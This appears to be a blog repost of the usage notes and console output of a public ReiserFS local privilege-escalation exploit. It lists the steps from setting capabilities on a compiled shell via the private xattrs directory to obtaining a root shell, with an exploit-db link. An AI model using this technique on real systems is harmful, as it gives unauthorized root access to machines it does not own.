Author: Jon Oberheide
Usage:
$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm), ...
Notes:
Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.
'''
http://www.exploit-db.com/exploits/12130
Labels
- BACKTRACK (5)
- BUFFER OVERFLOW (2)
- EBOOKS (1)
- LINUX (2)
- METASPLOIT (9)
- NEWS (3)
- Penetration Testing (1)
- PYTHON (2)
- set (1)
- TOOLS (2)
- VIDEOS (5)
